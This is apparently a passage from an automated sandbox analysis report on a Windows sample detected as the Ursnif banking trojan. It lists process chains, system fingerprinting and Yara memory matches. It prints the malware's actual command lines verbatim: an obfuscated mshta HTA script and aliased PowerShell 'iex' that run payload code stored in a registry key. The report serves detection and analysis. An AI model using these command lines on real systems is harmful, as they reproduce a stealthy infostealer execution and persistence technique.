Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D21BC cpuid 1_2_017D21BC
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0799A CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_03B0799A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D414A GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_017D414A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D5A5A CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_017D5A5A
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_017D21BC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_017D21BC

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000006.00000003.330162595.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.392202470.0000000005AB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.411738935.00000000064A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338066734.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349294200.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.437697839.00000205D155C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349136332.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330265188.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.343128725.0000000005568000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339561457.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338125787.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338174961.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.438121484.0000014B5DD8C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.413542435.0000000005DE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338136102.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349238253.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.333735051.0000000003AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330104762.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330149161.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339592221.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349114643.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339580367.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.396945352.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.349219356.000000000536C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.338105591.00000000038AC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.323045956.0000000004CB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339543632.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.334273561.00000000052B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.330131368.0000000004ABC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.339627226.00000000050BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5784, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6944, type: MEMORYSTR